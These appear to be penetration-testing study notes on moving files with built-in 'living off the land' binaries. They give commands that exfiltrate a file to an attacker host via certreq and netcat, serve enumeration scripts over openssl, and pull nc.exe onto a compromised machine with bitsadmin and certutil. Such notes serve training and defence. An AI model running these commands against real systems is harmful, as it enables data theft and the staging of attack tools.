- two websitses that aggregate information on living off the land binaries - LOLBAS for Windows binaries - GTFOBins for Linux binaries # LOLBAS - search for "/upload" - results: `CertReq.exe`, `ConfigSecurity{olicy.exe`, and `DataSvcUtil.exe` ```cmd #example upload from Windows using CertReq.exe certreq.exe -Post -config http://<kali_host_ip>:<port>/ C:\Users\htb\Desktop\test.txt ``` ```bash #catch upload with netcat sudo nc -lvnp 8000 ``` # GTFOBins - search for "+file download" - results: `ab`, `bash`, `cpan`, `curl`, ... , `openssl` ```bash #setup on Kali host openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem #create cert openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < /tmp/LinEnum.sh #make LinEnum.sh available on port 80 ``` ```bash #download file on compromised target openssl s_client -connect <kali_host_ip>:80 -quiet > LinEnum.sh ``` # Other Common Lving off the Land Tools ## Bitsadmin - Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites or SMB shares - BITS intelligently chceks host and network utilization to minimize impact on user's fg work ```powershell bitsadmin /transfer wcb /priority foreground http://<kali_host_ip>:8000/nc.exe C:\Users\htb\Desktop\nc.exe #download nc.exe from target Import-Module bitstransfer; Start-BitsTransfer -Source "http://<target_ip>:80/nc.exe" -Destintation "C:\Windows\Temp\nc.exe" #download nc.exe from target ``` ## CertUtil - tool that can be used to download arbitrary files like wget - its usage may be detected by the Antimalware Scan Interface (AMSI) ```cmd certutil.exe -verifyctl -split -f http://<target_ip>:8000/nc.exe #download nc.exe from target ```